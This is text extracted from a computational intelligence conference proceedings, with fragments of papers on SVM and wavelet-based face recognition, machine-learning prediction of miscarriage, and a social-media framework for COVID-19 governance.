8 83.75 0.479 48.75 0.556
9 92.5 0.531 42.5 0.498
To further enhance the performance of ESVM, tests were done with different kernels
with varying training images. Kernels are set of mathematical functions used by
any SVM algorithm which transforms data into the preferred form. Various kernel
functions used are linear, nonlinear, polynomial, sigmoid and Gaussian kernel. On
Yale database, a combination of linear kernel with OVA gave maximum results.
Recognition accuracy with polynomial kernel of order 2 with OVA classification
was found to be 85.33%, whereas with Gaussian kernel, it improved to 93.33%,
404 T. Jain and J. Yadav
Table 5 Result on Yale and ORL database when proposed ESVM system was applied with different
kernels and OVA classification on different training sets
Kernels YALE ORL
Acc (%) t i (s) Acc (%) t i (s)
Linear(1) 100% 0.171 92.5 0.545
Polynomial(2) 85.33 0.179 82.5 0.603
Gaussian(3) 93.33 0.209 57.5 0.123
Fig. 7 Accuracy of
proposed system on Yale and
ORL database by applying
different kernels at different
number of training images
and with linear kernel, we attained maximum accuracy rate of 100% with 9 training
images per individual. Also time taken to compute is less in linear kernel as shown
in Table 5.
On ORL database, recognition accuracy with polynomial kernel of order 2 with
OVA classification was found to be 57.5%, whereas with Gaussian kernel, it improved
to 82.5%, and with linear kernel, we attained maximum accuracy rate of 92.5% with
9 training images per individual as shown in Table 5 (Comparison of ORL and Yale
shown in Fig. 7).
Table 7 Proposed
Approaches Accuracy rate (%)
methodology comparison
with various techniques on PCA_KNN (k = 5) [23] (No. of training 72
ORL database images = 7)
PCA_SVM (poly quad) [24] 72.9
PCA_SVM (poly linear) [24] 76.7
PCA_KNN (k = 3) [23] (No. of training 78
images = 7)
DCT_PCA [25] (No. of training images 91.84
= 6)
Proposed methodology (No. of training 92.5
images = 9)
5 Conclusion
In this paper, a technique for multi-classification of face has been proposed based on
ESVM in fisher subspace. The proposed multi-classifying technique was utilized on
ORL and Yale databases in which an accuracy of 100 and 92.5% was achieved. This
method outperforms traditional SVM as shown in comparison and is computationally
faster than it. A number of experiments were performed on different kernels of
proposed ESVM technique and by varying dimensions to achieve high accuracy.
ESVM works better with linear kernel using OVA classification method and also,
better than other techniques. As future work, we have been applying wavelets in
combination with our proposed methodology and exploring other machine learning
algorithms for performing classification.
406 T. Jain and J. Yadav
References
19. Rajpal, N., Singh, A., & Yadav, J. (2018). An expression invariant face recognition based on
proximal support vector machine. In 2018 4th International Conference for Convergence in
Technology (I2CT) (pp. 1–7). https://doi.org/10.1109/I2CT42659.2018.9058243.
20. Ouyanga, A., Liub, Y., Pei, S., Penga, X., He, M., & Wang, Q. (2020) A hybrid improved
kernel LDA and PNN algorithm for efficient face recognition. Neurocomputing, 393, 214–222.
https://doi.org/10.1016/j.neucom.2019.01.117.
21. Zhang, T., Tang, Y. Y., Fang, B., Shang, Z., & Liu, X. (2009). Face recognition under varying
illumination using gradientfaces. IEEE Transactions on Image Processing, 18(11), 2599–2606.
https://doi.org/10.1109/TIP.2009.2028255
22. Nayef Al-Dabagh, M. Z., Mohammed Alhabib, M. H., & AL-Mukhtar, F. H. (2018). Face
recognition system based on kernel discriminant analysis, k-nearest neighbor and support
vector machine. International Journal of Research and Engineering, 5(3), 335–338.
23. Rakshit, P., Basu, R., Paul, S., Bhattacharyya, S., Mistri, J., & Nath, I. (2019). Face detection
using support vector machine with PCA. In 2nd International Conference on Non-Conventional
Energy: Nanotechnology and Nanomaterials for Energy and Environment (ICNNEE).
24. Gumus, E., Kilic, N., Sertbas, A., & Ucan, O. N. (2010). Evaluation of face recognition using
PCA, wavelets and SVM. Expert Systems with Applications, 37, 6404–6408. https://doi.org/
10.1016/j.eswa.2010.02.079.
25. Abikoye, O. C., Shoyemi, I. F., & Aro, T. O. (2019). Comparative analysis of illumination
normalizations on principal component analysis based feature extraction for face recognition.
FUOYE Journal of Engineering and Technology, 4(1), 67–69.
Large Scale Double Density Dual Tree
Complex Wavelet Transform Based
Robust Feature Extraction for Face
Recognition
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 409
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_33
410 J. Chaudhary and J. Yadav
This section of the paper depicts preliminary description of the major multi-resolution
spectral analysis of images using wavelet transformation techniques. The discrete
wavelet transform (DWT) analyzed in study [12] depicts that it is possible to decom-
pose a digital image into a “approximation coefficient” which are the low-frequency
component content and “detailed coefficient” which is basically the high-frequency
components in an image. A 2D-DWT technique decomposes image into three detailed
sub-bands which are (LH, HL and HH) corresponding to vertical, horizontal and diag-
onal directional details, respectively. The LL (approximation) sub-image provides
the low-frequency details of an image. Some major shortcomings of DWT trans-
form are shift or translation invariance and lack of directional selectivity with few
orientations, which are 0o , ±90o , ±45oz .
Dual tree complex wavelet transform (DTCWT) is introduced in the study [13]
to overcome the weakness of DWT which provides less discrimination power for
face image features. This technique solves the issue of shift or translation variance in
images as any small change in input function does not cause interference in wavelet
coefficients. DTCWT also provides good angular resolution that gives better direction
selectivity in terms of orientation angles. In DTCWT, filter bank used in first level of
decomposition must differ from the filters used at subsequent stages. DTCWT gener-
ates wavelet coefficients of three orientations namely LH, HL and HH, respectively.
The six directional sub-bands each at real and imaginary tree so formed are LH + ,
HH + , HL + , LH − , HH − and HL − describing the edges(high-frequency components)
are oriented at −75◦ , − 45◦ , − 15◦ , + 15◦ , + 45◦ , + 75◦ , respectively.
Double density discrete wavelet transform (DD_DWT) is a variant of DWT
proposed in study of Selesnick in 2004 [14]. This technique has a 3-channel filter
bank structure which has one scaling (low pass) and two wavelets (high pass) func-
tions. Unlike DTCWT, in this method, same filters are used in all subsequent stages
412 J. Chaudhary and J. Yadav
[H1_H2, H1H3, H2_H1, H2_H2, H2_H3, H3_H1, H3_H2, H3_H3] where H1 repre-
sents low-pass filter and [H2, H3] are the two high-pass filters. Different analysis
filters are used in first stage and next higher levels of decomposition. In this way,
DD_DTCWT provides good directional selectivity by small-scale feature selection
also. Each tree contains one low-pass (approximation) sub-band and eight detailed
(high pass) sub-bands, respectively. The design implementation of DD_DTCWT at
first level of decomposition is demonstrated in Fig. 1.
Q = AT A (1)
2.3 Classification
The work has utilized cosine angle distance [18] metric [cos(X, Y )] for ORL
database which calculates the distance as provided in Eq. (5):
n
X i Yi
cos(X, Y ) = i=1
n (5)
n
i=1 X i .
2 2
i=1 Yi
The distances between test image and each face vector in training sample are
arranged in increasing order and the minimum distance is examined for providing
the nearest neighbor (matched image). To determine the efficiency and accuracy of
proposed system, a recognition rate is calculated by considering the percentage ratio
of matched images with total number of images in test set.
In proposed work, the face recognition is performed in two phases namely training
and testing (recognition) of face images. In first stage, the robust feature extraction
on considered face image database is performed based on DD_DTCWT technique
with different filters in first level and next subsequent levels of decomposition.
The selection of appropriate sub-band and level of decomposition is performed in
extensive experiments. This is accomplished by varying the number of decomposition
levels and number of training images per varying subjects of face database. At each
level, an approximation sub-image is selected for further decomposition which yields
better results. Furthermore, the dimensionality reduction of transformed face images
Large Scale Double Density Dual Tree Complex Wavelet … 415
3 Experimental Results
This section provides description of datasets that are utilized in the work. In another
part of section, the selection of DD_DTCWT sub-band and level of decomposition
for comprehensive experiments is also illustrated.
3.1 Dataset
The proposed work has utilized ORL and YALE face image databases to estimate
the accuracy rate. The ORL database consist of 400 grayscale images each with
resolution 112 × 92 which are in PNG format. This database includes 40 subjects
and each subject with 10 varying images. Likewise, YALE database has 165 images
with 15 subjects. In this, each subject consists of 11 different images with resolution
243 × 320 in GIF format. The face images in YALE database has varying effects of
illumination and face expression such as sad, happy, wink, surprised, etc.
The decomposition of ORL sample face image at level 1 by utilizing DD_DTCWT
is shown in Fig. 3a. This figure depicts the Lowpass/Approximation sub-band thus
formed for both real and imaginary parts, respectively. The detailed sub-band of ORL
face image (first orientation) is represented in Fig. 3b.
Fig. 3 Decomposition of ORL face image using DD_DTCWT: a Approximation sub-image formed
on real and imaginary trees. b Detailed/High pass sub-bands formed on real and imaginary trees
Large Scale Double Density Dual Tree Complex Wavelet … 417
Table 1 Experimental results on ORL database (400 total images) with decomposition level 3 and
approximation sub-band selection
Number of train images for each subject (total Recognition rate (%) Computational time (s)
number of testing images)
5(200) 93.5 3.063
6(160) 95 2.495
7(120) 96.6 1.905
8(80) 97.5 1.448
Table 2 Results on YALE database (165 total images) with decomposition level 3 and
approximation sub-band selection
Number of train images for each subject (total Recognition rate (%) Computational time (s)
number of testing images)
6(75) 86.6 6.695
7(60) 88.3 4.594
8(45) 84.4 3.738
9(30) 100 2.295
The results attained with proposed approach on ORL database are compared with
five techniques namely, DWT_PCA_SVM, DWT_FLD_SVM, DWT_DLDA_SVM,
MODULAR-2DPCA and (MF_GF_HE)_PCA_MultiSVM as illustrated in Table 3.
In the similar manner, the experimental results obtained on YALE database are
compared with five techniques such as IKLDA_PNN, GSB2DLPP, MLTP_SVM,
HE_GLPF_Gabor_PCA_SVM and RRHE-RFDWPT. The summary of results
attained in above-stated previous work is presented in Table 4.
Consequently, the comparison observed in Table 4 demonstrates that the proposed
methodology provides promising results when compared with other techniques. It
is also observed that RRHE-RFDWPT methodology [26] provides accuracy rate
Large Scale Double Density Dual Tree Complex Wavelet … 419
as 98.67 with 6 training images as best obtained results, while utilizing prepro-
cessing techniques to attain illumination normalization for invariant feature extrac-
tion. But in our work, the preprocessing techniques are not employed yet attained
100% recognition rate with 9 images in training set.
5 Conclusion
References
1. Zhao, W., Chellappa, R., Phillips, P. J., & Rosenfeld. (2003) Face recognition: a literature
survey. ACM Computing Surveys, 35(4), 399–458.
2. Stan, Z. L., & Jain, A. (2005). In Handbook of face recognition, Springer.
3. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent and Fuzzy Systems, 35, 5265–5277.
4. Yadav, J., Rajpal, N., & Mehta, R. (2018). An improved hybrid illumination normalization
and feature extraction model for face recognition. International Journal of Applied Pattern
Recognition, 149–170.
5. Selvakumar, K., Jerome, J., & Rajamani, K. (2016) Robust face identification using DTCWT
and PCA subspace based sparse representation. Multimedia Tools and Applications, 16073–
16092.
6. Wang, J. W. et al. (2018). Illumination compensation for face recognition using adaptive
singular value decomposition in the wavelet domain. Information Sciences, 435, 69–93.
7. Vishwakarma, V., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools Applications, 79, 11503–11529.
8. Lahaw, Z., Essaidani, D., & Seddik, H. (2018). Robust face recognition approaches using PCA,
ICA, LDA based on DWT, and SVM algorithms. In 2018 41st International Conference on
Large Scale Double Density Dual Tree Complex Wavelet … 421
Abstract Miscarriage or spontaneous abortion is the natural death of the fetus before
20 weeks of pregnancy. Stillbirth is the term used to refer to the fetus’s demise after
this period. Miscarriage can harm both the parents. One cannot reverse the outcome
of pregnancy. The only way to deal with miscarriage is to take certain precautions
and prevent it. With this objective, this study uses various machine learning tech-
niques such as Logistic Regression, K-Nearest Neighbors, and Random Forest to
predict a pregnancy’s outcome based on specific features. This paper focuses on
each model’s contribution and compares the algorithms’ efficiency based on some
standard evaluation measures.
1 Introduction
The most common reason for losing a baby during pregnancy is miscarriage. An orga-
nization called the March of Dimes, working on maternal and child health, reported
that a 10–15% rate of miscarriage is present in women aware of their pregnancy.
Nearly 2 million babies are stillborn every year. These numbers can be higher as
there is no systematic recording for miscarriages and stillbirths, even in developed
countries.
There are various causes of miscarriage, some of the common ones being the
mother’s age, chromosomal abnormalities, and uterine infections. Since spontaneous
abortion is an irreversible phenomenon, this affects the physiological and psycho-
logical well-being. Recurrent miscarriages are likely to have far-reaching negative
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 423
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_34
424 S. Biswas and S. Shukla
impacts on both the parents. The only solution that can be beneficial is the preven-
tion of miscarriage. Henceforth, it is necessary to predict whether a pregnant woman
is likely to experience miscarriage, based on some standard criteria, as early as
possible. This work employs various machine learning classification algorithms for
this purpose. The main objective is to facilitate easy prediction of pregnancy outcome
to prevent miscarriage.
The remaining part of the paper appears in this manner. In Sect. 2, we overview
the existing literature on the prediction of miscarriage and its prevention. Section 3
explains the methodology used to achieve the study’s objective, followed by the
experimental results and discussion. Finally, we conclude and cite the references
used for the analysis.
2 Related Work
Magnus et al. [1] estimated the rate of miscarriage by associating it with the woman’s
age and pregnancy history using logistic regression, sensitivity analysis, and cluster
variance estimation. However, miscarriage can result from various underlying biolog-
ical and psychological causes, which form significant risk factors. The study did not
consider these factors.
Bruno et al. [2] designed a support decision system tool using support vector
machine to group recurrent pregnancy loss (RPL) patients into four risk classes
concerning the number of miscarriages. Unbalanced accuracy is present in the model
built using the most informative features. But when the authors used the features
recommended by the European Society of Human Reproduction and Embryology
(ESHRE), the accuracy obtained was very low. Hence, the system is less reliable.
In [3], the authors constructed and compared six machine learning classification
models, namely logistic regression, support vector machine (SVM), decision tree,
backpropagation neural network (BNN), extreme gradient boosting, and random
forest. They did this to predict the early pregnancy loss after noticing embryonic
cardiac activity, undergoing in-vitro fertilization-embryo transfer. They suggested
random forest for doctors’ better clinical decisions as they saw its performance
outperforming those of other models. However, the study did not specify the reason
for choosing BNN or any other neural network.
Pruthi et al. [4] predicted the high risks of pregnancy using decision tree, SVM,
Naïve Bayes, neural network associative classifier, and logistic regression by consid-
ering the factors responsible for pregnancy risk. They used a dataset containing all
the historic maternal information for this purpose. But it has not been noted in the
paper. No note of data mining or data processing exists through deep learning or any
advanced techniques which could have altered the accuracy.
Asri et al. [5] designed a framework for continuous monitoring where the unsu-
pervised ML algorithm K-means clustering was used in Apache Spark. The algo-
rithm takes in the data input received through the mobile application and sensors
and predicts the risk of miscarriage based on them. The execution time should be
A Miscarriage Prevention System Using Machine Learning Techniques 425
fast with the highest classification accuracy. The drawback is that the model used
for giving the highest result does not provide much accuracy. Also, the data used is
highly biased by one particular age group.
Srinivasa et al. [6] presented four critical machine learning and deep learning
techniques in a theoretical manner to assist the gynecologists in improved treatment
of infertile women. They performed machine learning on the past infertility data and
then updated the deep learning process. However, the approach did not address the
practicality for the same in the study.
In [7], the authors conducted a survey study on 293 pregnant women attending an
early pregnancy assessment unit (EPAU). They designed the questionnaire based on
the literature review, also considering data from validated psychometric tests. They
used logistic regression to find the probability of miscarriage for all the independent
variables. The study found significant associative results but used no other algorithm
to validate the accuracy.
Koivu et al. [8] constructed classifiers using logistic regression, artificial neural
network, and gradient boosting decision trees on a CDC dataset with almost sixteen
million records. They further used the NYC dataset for evaluating the predictive
models created using the former dataset. Using the SELU network, they predicted
the early stillbirth. However, this network restricts to improvements within four
layers. They can improve the prediction performance by balancing the classes in the
data.
To stratify pregnancies with a high risk of stillbirth in [9], the authors developed a
set of different models to predict stillbirth. They did this using five machine learning
algorithms for binary classification, namely regularized logistic regression, decision
trees based on classification and regression trees (CART), random forest, extreme
gradient boosting, and a multilayer perceptron neural network. They validated the
method using the stratified K-folds technique. Although extreme gradient boosting
achieves the highest accuracy, the predictors’ accuracy varies throughout the gesta-
tional period. The exact timing for the predictors used was unavailable, and all risk
factors are unknown at a given point in time.
In [10], the authors developed a machine learning model using the extreme
gradient boosting algorithm to predict the presence of gestational diabetes mellitus
(GDM) in 19,331 women during their early pregnancy stage. They compared this
algorithm’s performance with a logistic model, which underperformed here. We do
not see any other algorithm for comparison, and hence, it will be unreliable to term
the model as the optimal one for the desired purpose.
The authors applied the C4.5 decision tree algorithm in [11] on the pregnancy
data in two ways: standardized and unstandardized. The classification performance
was better in standardized data with better accuracy and less error. The study was
limited to one algorithm for pregnancy-based classification.
A K-means clustering approach was applied in [12] on a controlled trial of preg-
nant women during the first trimester of pregnancy to analyze the presence of
hypothyroidism and the associated risk factors. As a result, the authors identified
three distinct clusters. Also, cluster analysis took into account the heterogeneity in
426 S. Biswas and S. Shukla
the study. But this analytical study lacked generalization, and the authors need to
consider a larger sample for validating the achieved associations.
Chang et al. [13] used the self-organizing map (SOM) technique and K-Modes
to generate co-morbidity-based clusters. Clusters were identified and validated for
diabetes mellitus and pregnancy cases ranging from standard to preterm birth. SOM
technique quickly and accurately identified cluster structures compared to the K-
Modes method. However, no domain expert validated the results, and therefore, we
cannot extend the results to clinical significance.
M. Tahir et al. [14] designed a neural network to classify preeclampsia based on
a dataset having 17 parameters. After considering the previous PE case history, the
algorithm was applied once, excluding the same. Accuracy decreased significantly
when the model did not use the last PE case. Neural network resulted in more accurate
classification than other algorithms, namely Naive Bayes, K-nearest neighbors, linear
regression, logistic regression, and support vector machine. Accuracy can increase
using feature selection methods.
Andriani et al. [15] developed an automatic classification algorithm to detect
blighted ovum’s presence on the ultrasound image, using CNN. Detection of a
blighted ovum in the early stage can save the underdeveloped fetus. The model
trained the images using the Keras library in Python. The accuracy of detection was
less than 60%, which can improve by using more inputs for training and adding one
pre-processing stage to make it easy to differentiate for data input with high similarity
levels.
An expert system using artificial neural network and backpropagation algorithm
was proposed by Malyawati et al. [16] for early prediction of critical pregnancy.
Using 17 input parameters and five output classes, an accuracy of 78.248% was
achieved. All the symptoms considered formed a single pattern. The system used
various ratios for training and testing data. The small size of the input data may have
resulted in a compromise in the system’s accuracy.
In [17], the authors developed a multilayer neural network using 308 features of
multi-dimensional pre-pregnancy data, resulting in an accuracy of 89.2%. They did
this to detect and classify the critical pregnancy outcomes into six prominent labels.
The study limited the proposed framework’s comparison, with only two existing
algorithms: a five-layer fully connected neural network and a decision tree.
Krisnanik et al. [18] developed a pregnancy risk detections system (PRDS) to
detect the risk level of pregnancy based on the symptom(s) experienced by the preg-
nant woman. They did this through an observational study using the descriptive,
predictive, and prescriptive data analysis approach. The study provided a particular
recommendation of improvement to reduce pregnant women’s mortality rate with
higher risk levels during this period. However, the authors did not incorporate any
validation strategy and conducted the study on a very small sample.
In [19], the authors proposed a nature-inspired algorithm called particle swarm
optimization (PSO) to reduce the cost of multilayer perceptron (MLP). This technique
was better in precision and price for the clinical decision support systems (CDSSs)
A Miscarriage Prevention System Using Machine Learning Techniques 427
used for pregnancy care. The study found the PSO algorithm to have early conver-
gence. Hence, this failed to be the best method for optimizing other ANN-based
techniques’ parameters.
Shafi et al. [20] presented some machine learning algorithms, namely random
forest, K-nearest neighbor, decision tree, support vector machine, and multilayer
perceptron, to propose a cleft prevention solution in the mother’s womb. Cleft is a
gap in the upper lip and the baby’s mouth roof during development in the uterus.
Multilayer perceptron, being a deep neural network, gave more accurate results. But
the data inputs for the prediction are comparatively less.
Moreira et al. [21] did a performance-based comparative study of the Bayes-based
machine learning techniques to determine the optimal algorithm for the classification
of hypertensive disorders during pregnancy. They did this using the cross-validation
method. The study’s scope did not extend to incorporating other machine learning
classification techniques.
In [22], the authors used the Naïve Bayes method for the Intra-Uterine Growth
Restriction (IUGR) diagnosis in pregnancy. The presence of IUGR indicates the
fetus to grow smaller than the expected standard size, thus, affecting the safety of the
woman and the fetus. Hence, we can apply this study to detect such abnormalities in
pregnant women. However, using one model has limited the scope of the study.
Tayal et al. [23] compared the efficiency of different data mining techniques and
identified decision tree as the most efficient algorithm in accuracy and specificity. The
study explored pregnancy health and new-born health issues but found no concrete
solution regarding a topic.
In [24], the authors proposed a Gaussian Naïve Bayes model to identify the risk
of abortion in pregnancy and reduce fetal mortality. They considered variables for
this purpose. The accuracy obtained was 96% for the balanced dataset. The model
is not embedded to provide useful results for medical experts.
In [25], the authors tried to make an early prediction of preterm delivery using
EHG recordings for a particular gestation period. Random forest classifier combined
with ADASYN provided an accuracy of 99.23%. This approach could predict the
classification for shorter EHG recordings, but the study did not explore the results’
robustness and validation.
3 Methodology
The dataset used for miscarriage detection has been taken from the GitHub reposi-
tory. It was downloaded in a comma-separated value file and loaded in the Python
environment. Previously, Asri et al. [26] collected the primary data using a mobile
phone application and healthcare sensors.
The dataset has ten lakh records and ten attributes of interest: unique record
ID, maternal age, body mass index, number of previous miscarriages, physical
activity, location, body temperature, heart rate variability, stress, and blood pres-
sure. The target variable has two labels: 1 and 0, which denote the occurrence and
non-occurrence of miscarriage, respectively.
The dataset has no missing values, verified using the Pandas library in Python. The
variables in the dataset are continuous and categorical. While age, BMI, temper-
ature, BPM are continuous in nature, activity, location, stress, and blood pressure
are categorical variables. It is evident in Fig. 2 that age is positively correlated with
the target while BMI, temperature, BPM are negatively correlated with the target.
The intensity of physical activity and high-stress level increases the risk of miscar-
riage. While checking each attribute’s proportion, it has been found that 99.7% of
the records were of women of 25 years old. These records highly dominated the
entire dataset and created a biased classification. Hence, stratified sampling has been
performed, where a fixed value of strata is considered for all the age groups. For each
value of the age, the corresponding features were taken into account. This task has
been performed to maintain an equal proportion to balance the data and remove the
dataset’s bias. Hence, after selection, the total number of records was 1775 with ten
attributes.
80% of the dataset has been used to train the algorithms, while 20% has been tested.
The algorithms used for model building are K-nearest neighbor (KNN), logistic
regression, and random forest.
KNN is a supervised classification algorithm and needs labeled data for training.
The test data point is predicted using KNN from the available class labels by finding
the distance between the test point and trained k-nearest feature values. This process
involves calculating the distance between the data points using distance measures
such as Euclidean distance, Manhattan distance, Hamming distance, and Minkowski
distance. The main steps for KNN are as follows: to check the data and calculate
A Miscarriage Prevention System Using Machine Learning Techniques 429
the lengths, find the closest neighbors, label the data point, and vote for the labels.
For choosing K’s optimal value, a plot is derived between error rate and K denoting
values in a defined range. Then, the K value having a minimum error rate is chosen.
Logistic regression is a supervised algorithm used to divide the dataset into classes
by estimating the probabilities using a sigmoid/logistic function. The aim is to find
the best fitting model to describe the relationship between the binary dependent
variable and a set of independent variables. There are some assumptions in logistic
regression which include the following:
430 S. Biswas and S. Shukla
• For binary logistic regression, the dependent variable needs to be binary. The first
level of the dependent variable factor should also represent the desired outcome.
• The model should have negligible or no multicollinearity.
• Logistic regression needs a large sample size.
Random forest is a supervised algorithm used for both classification and regres-
sion. Its use as a classification technique has been focused on in this work. Multiple
decision trees construct a random forest. It is preferred over a single decision tree as
it uses an ensemble learning approach by taking an average of the result and reducing
the overfitting. The steps involved in random forest are a selection of random samples,
construction of a decision tree for every sample to obtain the individual prediction,
voting for the predicted result, and the section of the voted result with the highest
frequency as the final prediction result.
The model validation has been performed using the K-fold cross-validation tech-
nique, where K’s value is taken as 10. The performance metrics used here are the
confusion matrix, accuracy, precision, recall, F1 score, AUC score, and ROC curve.
The accuracy obtained for K-Nearest Neighbor, Logistic Regression, and Random
Forest is 95, 97, and 97%, respectively. Therefore, it can be concluded that random
forest can, 97% of the time, correctly predict whether the woman will have a
miscarriage or not.
The precision is 100% for all three models for women labeled to have no miscar-
riage. For logistic regression and random forest, the precision obtained is 95% for
women labeled to have a miscarriage. For K-nearest neighbor, the precision obtained
is 94% for women labeled to have a miscarriage.
In all the three models, the recall obtained is 94% for women labeled to have no
miscarriage. The recall obtained is 100% for women labeled to have a miscarriage
in all three models.
In all three models, the F1 score obtained is 97% for both women labeled to have
a miscarriage and no miscarriage.
From the ROC curve obtained as shown in Fig. 3, it is evident that all three models
have high separability power, which means that they have high chances of accurately
classifying a new case. As the ROC curve for random forest and logistic regression is
slightly above that of K-nearest neighbor, the chances of classification are somewhat
better for them.
Therefore, all the three techniques considered for the classification here have high
accuracy. However, random forest and logistic regression show greater accuracy than
KNN. Random forest is recommended for application in practical situations as it is
based on ensemble learning, prevents overfitting, and has useful functionality.
A Miscarriage Prevention System Using Machine Learning Techniques 431
5 Conclusion
This work highlights the various machine learning classification models constructed
to predict miscarriage during pregnancy’s early stages. A comparative analysis is
done to check the constructed model’s performance using some standard evalua-
tion metrics. It will be beneficial for the patient and the concerned experts to take
the necessary precautions to prevent miscarriage. Primary data collection was not
possible from the healthcare centers due to the COVID-19 scenario. The study is
limited to a few classification algorithms. We plan to extend this work by collecting
data primarily from hospital records and using other classification and regression
techniques.
References
1. Magnus, M. C., Wilcox, A. J., Morken, N. H., Weinberg, C. R., & Håberg, S. E. (2019). Role
of maternal age and pregnancy history in risk of miscarriage: Prospective register based study.
BMJ (Online), 364, 1–8.
2. Bruno, V., D’Orazio, M., Ticconi, C., Abundo, P., Riccio, S., Martinelli, E., Rosato, N., Piccione,
E., Zupi, E., & Pietropolli, A. (2020). Machine learning (ML) based-method applied in recurrent
pregnancy loss (RPL) patients diagnostic work-up: A potential innovation in common clinical
practice. Scientific Reports, 10(1), 1–12. https://doi.org/10.1038/s41598-020-64512-4
3. Liu, L., Jiao, Y., Li, X., Ouyang, Y., & Shi, D. (2020). Machine learning algorithms to predict
early pregnancy loss after in vitro fertilization-embryo transfer with fetal heart rate as a strong
predictor. Computer Methods and Programs in Biomedicine, 196, 105624.https://doi.org/10.
1016/j.cmpb.2020.105624
432 S. Biswas and S. Shukla
20. Shafi, N., Bukhari, F., Iqbal, W., Almustafa, K. M., Asif, M., & Nawaz, Z. (2020). Cleft
prediction before birth using deep neural network. Health Informatics Journal, 54590. Available
at https://doi.org/10.1177/1460458220911789
21. Moreira, M. W. L., Rodrigues, J. J. P. C., Carvalho, F. H. C., Chilamkurti, N., Al-Muhtadi, J.,
& Denisov, V. (2019). Biomedical data analytics in mobile-health environments for high-risk
pregnancy outcome prediction. Journal of Ambient Intelligence and Humanized Computing,
10(10), 4121–4134. https://doi.org/10.1007/s12652-019-01230-4
22. Badriyah, T., Savitri, N. A., Sa’adah, U., & Syarif, I. (2020). Application of naive bayes method
for IUGR (Intra Uterine Growth Restriction) diagnosis on the pregnancy. In 2020 International
Conference on Electrical, Communication, and Computer Engineering (ICECCE) (pp. 1–4).
Istanbul, Turkey. https://doi.org/10.1109/ICECCE49384.2020.9179256
23. Tayal, D. K., Meena, K., Pragya, & Kumar, S. (2018). Analysis of various data mining tech-
niques for pregnancy related issues and postnatal health of infant using machine learning and
fuzzy logic. In 2018 3rd International Conference on Communication and Electronics Systems
(ICCES) (pp. 789–793). Coimbatore, India. https://doi.org/10.1109/CESYS.2018.8724082
24. Campero-jurado, I., Robles-camarillo, D., & Simancas-acevedo, E. (2020). Problems in
pregnancy, modeling fetal mortality through the Naïve Bayes classifier. 11(3), 121–129.
25. Despotović, D., Zec, A., Mladenović, K., Radin, N., & Turukalo, T. L. (2018). A machine
learning approach for an early prediction of preterm delivery. In 2018 IEEE 16th International
Symposium on Intelligent Systems and Informatics (SISY ) (pp. 000265-000270). Subotica.
https://doi.org/10.1109/SISY.2018.8524818
26. Asri, H., Mousannif, H., & Al Moatassime, H. (2018). Comprehensive miscarriage dataset for
an early miscarriage prediction. Data in Brief, 19, 240–243. https://doi.org/10.1016/j.dib.2018.
05.012
Efficacious Governance During
Pandemics Like Covid-19 Using
Intelligent Decision Support Framework
for User Generated Content
Abstract During the unprecedented global health emergency caused by the pan-
demic Covid-19, the governments and nationalized organizations of all countries
are struggling to control its spread by enforcing various measures, and also manage
its social economic impact through policy intervention. In such critical situation, it
becomes imperative to take data driven decisions. User generated content over online
social media is an untapped data source that can be leveraged to gain insights for
effective governance and decision making; and can also serve as a first hand commu-
nication medium between the various government bodies and citizens. In this paper,
we have proposed a novel governance framework that leverages user generated con-
tent on social media for effective decision making by the authorities. We have used
topic modelling techniques to discover social-economic trends, and to understand
the issues or concerns of public interest. We used information extraction techniques
like noun and verb phrase extraction, and Named Entity Recognition to measure
the geographical spread, identify Covid-19 hotspots, assist in contact tracing, and
discovering new health conditions. From the available literature, we could not find
any intelligent framework for effective governance during pandemics, where user
generated content has been utilized for real time decision making. In this paper, we
address this real world problem through our proposed decision support System, and
demonstrate as a proof-of-concept of how it can be used for effective governance
during the pandemics through its prototype implementation.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 435
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_35
436 R. Jindal and A. Malhotra
1 Introduction
1 https://www.who.int/director-general/speeches/detail/who-director-general-s-opening-
remarks-at-the-media-briefing-on-covid-19—11-March-2020.
Efficacious Governance During Pandemics … 437
ment bodies and various other national organizations; and can assist in the following
tasks that are otherwise difficult to accomplish in real time, time bound manner even
with large human bandwidth:
• In our proposed framework, we use topic modelling techniques to discover and
predict various social and economic trends at national and regional level; and to
understand issues and public concerns. This serves as a useful input for policy
intervention and formulation to manage the collateral impact caused by the pan-
demic in all social-economic public and private sectors.
• We used unsupervised information extraction and aggregation techniques like:
Noun and verb phrase extraction, Named Entity Recognition and clustering on
user generated content from social media to measure geographical spread, identify
Covid-19 hotspots, assist in contact tracing, discovering new symptoms and health
condition indicators.
• We have done a prototype implementation of our proposed framework as a proof-
of-concept that it can serve as a decision-making tool for effective governance
during such health emergencies. This is a novel idea for governance during pan-
demics, as we could not find a similar framework from the existing literature
survey.
These are the major contributions of our proposed framework that are explained in
the subsequent sections with implementation results on a sample dataset. The related
literature survey is discussed in the following section.
The scope of this section is to discuss the relevant research published in the last year
since the pandemic outbreak, where machine learning and natural language tech-
niques have been used for Covid-19 related applications and use cases, specifically
utilizing user generated content from social media. Even though some research has
been done for opinion and sentiment analysis related to Covid-19 from social media;
we did not find any research or prototype where a comprehensive framework has
been proposed or implemented for effective governance and management of social-
economic issues due to the unprecedented pandemic situation caused by the novel
Corona virus.
Oyebode et al. have analysed the sentiment polarity of Covid-19 related com-
ments from various social media by extracting opinionated key phrase and themes
using predefined POS grammar rules (context based NLP techniques). This tech-
nique helped in discovering positive and negative themes/issues related to Covid-19
across various categories (e.g. economics, education, socio-political) and understand
corresponding public perceptions [4]. Samuel et al. have performed very basic sen-
timent classification of Covid-19 related Tweets using logistic regression and Naïve
Bayes [5]; another study analysis the emotions and sentiments evoked by English
News headlines [6]. A study using NLP feature engineering techniques, trend anal-
438 R. Jindal and A. Malhotra
